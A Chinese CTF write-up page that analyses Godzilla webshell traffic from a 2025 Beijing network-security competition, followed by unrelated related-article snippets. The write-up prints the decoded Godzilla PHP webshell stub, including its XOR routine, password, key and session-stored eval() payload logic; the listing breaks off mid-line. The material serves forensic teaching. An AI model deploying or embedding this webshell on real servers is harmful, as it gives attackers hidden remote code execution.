当前位置: 首页 > article >正文

2025年北京市职工职业技能大赛第六届信息通信行业网络安全技能大赛复赛CTF部分WP-哥斯拉流量分析

article 2025/6/2 23:14:35

2025年北京市职工职业技能大赛第六届信息通信行业网络安全技能大赛复赛CTF部分WP-哥斯拉流量分析

一、流量分析

题目没有任何提示,附件gzl.pcap
在这里插入图片描述

解题哥斯拉流量300多KB包很多,没啥经验只能挨个看回来之后又狠狠得撸了一把哥斯拉流量分析我这里用的是哥斯拉4.0.1

在这里插入图片描述
在这里插入图片描述

测试链接这里发了两个包,我们进行分析

1、第一个请求包

哥斯拉将payload进行了base64编码,并且将编码后的内容做了字符串反转,我们echo进行还原
在这里插入图片描述

<?php
// 安全增强设置
@session_start();             // 启动会话存储(用于保存Payload)
@set_time_limit(0);           // 取消脚本执行时间限制
@error_reporting(0);          // 禁用错误报告(避免泄露信息)/*** 核心加密/解密函数(使用XOR算法)* @param string $D 待处理数据* @param string $K 16字节密钥* @return string 处理后的数据*/
function encode($D, $K) {for ($i = 0; $i < strlen($D); $i++) {$c = $K[$i + 1 & 15];  // 循环使用密钥字符(i+1 mod 16)$D[$i] = $D[$i] ^ $c;  // 逐字节异或操作}return $D;
}// 配置参数
$pass = 'thisiskey';          // 通信密码(POST参数名)
$payloadName = 'payload';     // 会话中存储的Payload名称
$key = '144a6b2296333602';   // 16字节异或密钥(与客户端一致)// 主逻辑:处理客户端请求
if (isset($_POST[$pass])) {// 1. 解码客户端发送的数据$data = encode(base64_decode($_POST[$pass]), $key);// 2. 检查是否已加载Payloadif (isset($_SESSION[$payloadName])) {// 2.1 获取已存储的Payload并解密$payload = encode($_SESSION[$payloadName], $key);// 2.2 特殊处理:如果不是初始Payload(包含getBasicsInfo),需要二次解密if (strpos($payload, "getBasicsInfo") === false) {$payload = encode($payload, $key);}// 2.3 执行Payload(通常是PHP后门核心代码)eval($payload);// 2.4 生成响应包:前缀+加密结果+后缀echo substr(md5($pass.$key), 0, 16);           // 前缀:MD5前16字节echo base64_encode(encode(@run($data), $key)); // 加密响应数据echo substr(md5($pass.$key

相关文章:

2025年北京市职工职业技能大赛第六届信息通信行业网络安全技能大赛复赛CTF部分WP-哥斯拉流量分析

2025年北京市职工职业技能大赛第六届信息通信行业网络安全技能大赛复赛CTF部分WP-哥斯拉流量分析 一、流量分析 题目没有任何提示,附件gzl.pcap 解题哥斯拉流量300多KB包很多,没啥经验只能挨个看回来之后又狠狠得撸了一把哥斯拉流量分析我这里用的是哥斯拉4.0.1 测试链接…...

编程日记 2025/6/2 23:14:35

Django ToDoWeb 服务

我们的任务是使用 Django 创建一个简单的 ToDo 应用程序,允许用户添加、查看和删除笔记。我们将通过设置 Django 项目、创建 Todo 模型、设计表单和视图来处理用户输入以及创建模板来显示任务来构建它。我们将逐步实现核心功能以有效地管理 todo 项。 Django ToDoWeb 服务 …...

编程日记 2025/6/2 14:15:31

【软件】在 macOS 上安装 Postman

在 macOS 上安装 Postman 是一个简单的过程&#xff0c;以下是详细的步骤&#xff1a; 一、下载 Postman • 访问 Postman 官方网站&#xff1a; 打开浏览器&#xff0c;访问Postman 官方下载页面。 • 下载安装包&#xff1a; 页面会自动识别你的系统&#xff0c;点击“Dow…...

编程日记 2025/6/2 15:29:43

各种数据库,行式、列式、文档型、KV、时序、向量、图究竟怎么选?

慕然回首&#xff0c;发现这些年来涌现出了许多类型的数据库&#xff0c;今天抽空简单回顾一下&#xff0c;以便于后面用到时能快速选择。 1. 关系型数据库(行式) 关系型数据库&#xff08;RDBMS&#xff09;&#xff0c;我们常说的数据库就是指的关系型数据库。 它的全称是关…...

编程日记 2025/6/2 14:19:56

全志科技携飞凌嵌入式T527核心板亮相OpenHarmony开发者大会

近日&#xff0c;OpenHarmony开发者大会2025&#xff08;OHDC.2025&#xff0c;以下简称“大会”&#xff09;在深圳举办&#xff0c;全志科技作为OpenHarmony生态的重要合作伙伴受邀参会&#xff0c;并进行了《全志科技行业智能芯片OpenHarmony方案适配与认证经验分享》的主题…...

编程日记 2025/6/3 0:12:02

AI+微信小程序:智能客服、个性化推荐等场景的落地实践

在移动互联网流量红利逐渐见顶的今天,微信小程序凭借“即用即走”的轻量化特性,已成为企业连接用户的核心阵地。而AI技术的融入,正让小程序从工具型应用进化为“懂用户、会思考”的智能服务终端。本文将结合实际案例,解析AI在微信小程序中的两大核心场景——智能客服与个性…...

编程日记 2025/6/2 18:11:46

事件驱动架构入门

主要参考资料&#xff1a; 软件架构-事件驱动架构: https://blog.csdn.net/liuxinghao/article/details/113923639 目录 简介事件队列事件日志事件收集器响应队列读事件 vs. 写事件 简介 事件驱动架构是一种系统或组件之间通过发送事件和响应事件彼此交互的架构风格。当某个事…...

编程日记 2025/6/3 0:20:07

基于Web的濒危野生动物保护信息管理系统设计(源码+定制+开发)濒危野生动物监测与保护平台开发 面向公众参与的野生动物保护与预警信息系统

博主介绍&#xff1a; ✌我是阿龙&#xff0c;一名专注于Java技术领域的程序员&#xff0c;全网拥有10W粉丝。作为CSDN特邀作者、博客专家、新星计划导师&#xff0c;我在计算机毕业设计开发方面积累了丰富的经验。同时&#xff0c;我也是掘金、华为云、阿里云、InfoQ等平台…...

编程日记 2025/6/2 20:20:58

索引的选择与Change Buffer

1. 索引选择与Change Buffer 问题引出&#xff1a;普通索引 vs 唯一索引 ——如何选择&#xff1f; 在实际业务中&#xff0c;如果一个字段的值天然具有唯一性&#xff08;如身份证号&#xff09;&#xff0c;并且业务代码已确保无重复写入&#xff0c;那就存在两种选择&…...

编程日记 2025/6/3 1:53:06

leetcode hot100刷题日记——30.两数之和

解答&#xff1a; 方法一&#xff1a;迭代 迭代大致过程就是&#xff1a; 算两条链表的当前位的和&#xff0c;加上上一位留下来的进位&#xff0c;就是新链表的当前位的数字。计算当前的进位。 这样&#xff0c;我们迭代需要的东西是&#xff1a;链表1&#xff0c;链表2&…...

编程日记 2025/6/2 22:17:52

Fastapi 学习使用

Fastapi 学习使用 Fastapi 可以用来快速搭建 Web 应用来进行接口的搭建。 参考文章&#xff1a;https://blog.csdn.net/liudadaxuexi/article/details/141062582 参考文章&#xff1a;https://blog.csdn.net/jcgeneral/article/details/146505880 参考文章&#xff1a;http…...

编程日记 2025/6/1 10:11:16

Ollama:本地大模型推理与应用的创新平台

引言 随着大语言模型(LLM)和生成式AI的快速发展,越来越多的开发者和企业希望在本地或私有环境中运行AI模型,以满足数据隐私、安全、低延迟和定制化的需求。Ollama 正是在这一背景下诞生的创新平台。它让大模型的本地部署、推理和集成变得前所未有的简单和高效。本文将系统…...

编程日记 2025/6/1 10:09:57

rtpinsertsound:语音注入攻击!全参数详细教程!Kali Linux教程!

简介 2006年8月至9月期间&#xff0c;我们创建了一个用于将音频插入指定音频&#xff08;即RTP&#xff09;流的工具。该工具名为rtpinsertsound。 该工具已在Linux Red Hat Fedora Core 4平台&#xff08;奔腾IV&#xff0c;2.5 GHz&#xff09;上进行了测试&#xff0c;但预…...

编程日记 2025/6/2 13:18:29

django项目开启debug页面操作有数据操作记录

在项目的主文件中setting中配置 """ Django settings for ProjectPrictice project.Generated by django-admin startproject using Django 3.0.1.For more information on this file, see https://docs.djangoproject.com/en/3.0/topics/settings/For the ful…...

编程日记 2025/6/3 7:15:02

【Vim】高效编辑技巧全解析

本篇将从光标移动技巧、常用快捷操作、组合命令运用等方面逐步讲解 vim 的使用。 &#x1f4d8; 高效光标移动技巧 在 Vim 中&#xff0c;光标移动是编辑效率的核心之一。以下是一些必须掌握的移动命令&#xff0c;按使用频率和实用程度分类整理&#xff1a; &#x1f539; 基…...

编程日记 2025/6/2 14:32:39

基于 Node.js 的 Express 服务是什么?

Express 是基于 ‌Node.js‌ 的一个轻量级、灵活的 Web 应用框架&#xff0c;用于快速构建 ‌HTTP 服务‌&#xff08;如网站、API 接口等&#xff09;&#xff0c;以下是详细解析&#xff1a; ‌一、Express 的核心作用‌ ‌简化 Node.js 原生开发‌ Node.js 原生 http 模块虽…...

编程日记 2025/6/2 14:44:55

【C++】入门基础知识(1.5w字详解)

本篇博客给大家带来的是一些C基础知识&#xff01;包含函数栈帧的详解&#xff01; &#x1f41f;&#x1f41f;文章专栏&#xff1a;C &#x1f680;&#x1f680;若有问题评论区下讨论&#xff0c;我会及时回答 ❤❤欢迎大家点赞、收藏、分享&#xff01; 今日思想&#xff1…...

编程日记 2025/6/2 10:37:35

Excel数据脱敏利器:自动保留格式的智能脱敏脚本

源码&#xff1a; import openpyxl import re import random import string from openpyxl.utils import get_column_letter from copy import copy from tqdm import tqdmdef mask_data(value):"""脱敏处理数据"""if isinstance(value, str):i…...

编程日记 2025/6/2 18:42:23

Photoshop2025(PS2025)软件及安装教程

在数字图像编辑领域&#xff0c;Adobe Photoshop 一直是无可争议的王者。如今&#xff0c;Photoshop 2025 重磅登场&#xff0c;再次为我们带来了惊喜与变革&#xff0c;进一步巩固了它在行业中的领先地位。 Photoshop 2025 在人工智能方面的升级令人瞩目。其全新的 “Magic Se…...

编程日记 2025/6/2 19:40:24

AI赋能开源:如何借助MCP快速解锁开源项目并提交你的首个PR

引子 很多同学都梦想为开源项目贡献力量&#xff0c;然而现实往往是——面对庞大复杂的项目&#xff0c;从入门到提交第一个有实质性代码的PR&#xff0c;时间跨度可能长达数年。传统路径通常是先从文档贡献开始&#xff0c;逐步深入理解项目架构&#xff0c;最终才能进行代码…...

编程日记 2025/6/2 19:40:33

计算机视觉---GT(ground truth)

在计算机视觉&#xff08;Computer Vision, CV&#xff09;领域&#xff0c;Ground Truth&#xff08;GT&#xff0c;中文常译为“真值”或“ ground truth”&#xff09; 是指关于数据的真实标签或客观事实&#xff0c;是模型训练、评估和验证的基准。它是连接算法与现实世界的…...

编程日记 2025/6/2 15:55:05

SQL进阶之旅 Day 9:高级索引策略

【SQL进阶之旅 Day 9】高级索引策略 在SQL查询性能调优中&#xff0c;索引是最为关键的优化手段之一。Day 3我们已经介绍了基础索引类型&#xff0c;今天我们将深入探讨高级索引策略&#xff0c;包括覆盖索引、索引选择性分析、强制使用索引等实用技巧。这些技术能显著提升复杂…...

编程日记 2025/6/2 18:38:01

R 语言科研绘图第 52 期 --- 网络图-分组

在发表科研论文的过程中&#xff0c;科研绘图是必不可少的&#xff0c;一张好看的图形会是文章很大的加分项。 为了便于使用&#xff0c;本系列文章介绍的所有绘图都已收录到了 sciRplot 项目中&#xff0c;获取方式&#xff1a; R 语言科研绘图模板 --- sciRplothttps://mp.…...

编程日记 2025/6/2 18:39:21

姜老师的MBTI课程:MBTI是可以转变的

我们先来看内向和外向这条轴&#xff0c;I和E内向和外向受先天遗传因素的影响还是比较大的&#xff0c;因为它事关到了你的硬件&#xff0c;也就是大脑的模型。但是我们在大五人格的排雷避坑和这套课程里面都强调了一个观点&#xff0c;内向和外向各有优势&#xff0c;也各有不…...

编程日记 2025/6/2 9:52:46

Django【应用 02】第一个Django应用开发流程图

第 1 部分 安装 Django创建项目初始化应用配置视图、路由 第 2 部分 数据库配置语言和时区配置应用设置表初始化模型创建、激活、表创建管理员账号创建应用加入管理页面 第 3 部分 更多视图&#xff08;添加模板及模板调用、render、get_object_or_404、去除模板里的硬编码…...

编程日记 2025/6/2 19:49:27

湖北理元理律师事务所:用科学规划重塑债务人生

在债务问题日益普遍的当下&#xff0c;如何平衡还款压力与生活质量成为社会性难题。湖北理元理律师事务所通过“债务优化生活保障”的双轨服务模式&#xff0c;为债务人构建可持续的解决方案。其核心逻辑在于&#xff1a;债务处置不是剥夺生活&#xff0c;而是重建财务秩序。 …...

编程日记 2025/6/2 20:18:44

《江西棒球资讯》棒球运动发展·棒球1号位

联赛体系结构 | League Structure MLB模式 MLB采用分层体系&#xff08;大联盟、小联盟&#xff09;&#xff0c;强调梯队建设和长期发展。 MLB operates a tiered system (Major League, Minor League) with a focus on talent pipelines and long-term development. 中国现…...

编程日记 2025/6/2 18:11:59

华为OD机试_2025 B卷_静态扫描(Python,100分)(附详细解题思路)

题目描述 静态扫描可以快速识别源代码的缺陷&#xff0c;静态扫描的结果以扫描报告作为输出&#xff1a; 1、文件扫描的成本和文件大小相关&#xff0c;如果文件大小为N&#xff0c;则扫描成本为N个金币 2、扫描报告的缓存成本和文件大小无关&#xff0c;每缓存一个报告需要…...

编程日记 2025/6/2 13:00:51

python打卡训练营打卡记录day41

知识回顾 数据增强卷积神经网络定义的写法batch归一化&#xff1a;调整一个批次的分布&#xff0c;常用与图像数据特征图&#xff1a;只有卷积操作输出的才叫特征图调度器&#xff1a;直接修改基础学习率 卷积操作常见流程如下&#xff1a; 1. 输入 → 卷积层 → Batch归一化层…...

编程日记 2025/6/3 5:51:43

GD32F103系列工程模版创建记录

准备条件&#xff1a; 1&#xff1a;首先需要下载GD32F103的官方库 2&#xff1a;GD32F103的软件包 3&#xff1a;KEIL5软件 4&#xff1a;单片机GD32F103C8T6 本文已经默认KEIL5已将安装好GD32F103的软件包了 步骤一 基本模版创建 1 打开KEIL5软件&#xff0c;新建工程&am…...

编程日记 2025/6/2 13:00:47